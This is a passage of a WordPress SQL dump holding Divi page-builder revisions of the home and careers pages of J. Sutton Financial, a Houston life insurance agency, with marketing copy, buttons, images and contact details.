link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 12:20:09','2023-04-03 12:20:09','',138,'http://cmdev-site1.com/?p=665',0,'revision','',0),(649,1,'2023-04-02 20:02:12','2023-04-02 20:02:12','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" _dynamic_attributes=\"button_one_url\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2>Want to know how much insurance you need?</h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" _dynamic_attributes=\"button_one_url\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 20:02:12','2023-04-02 20:02:12','',138,'http://cmdev-site1.com/?p=649',0,'revision','',0),(648,1,'2023-04-02 20:01:17','2023-04-02 20:01:17','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Careers\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-02 20:01:17','2023-04-02 20:01:17','',38,'http://cmdev-site1.com/?p=648',0,'revision','',0),(650,1,'2023-04-02 20:13:03','2023-04-02 20:13:03','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" title_text=\"j sutton logo white no background\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2>Want to know how much insurance you need?</h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" 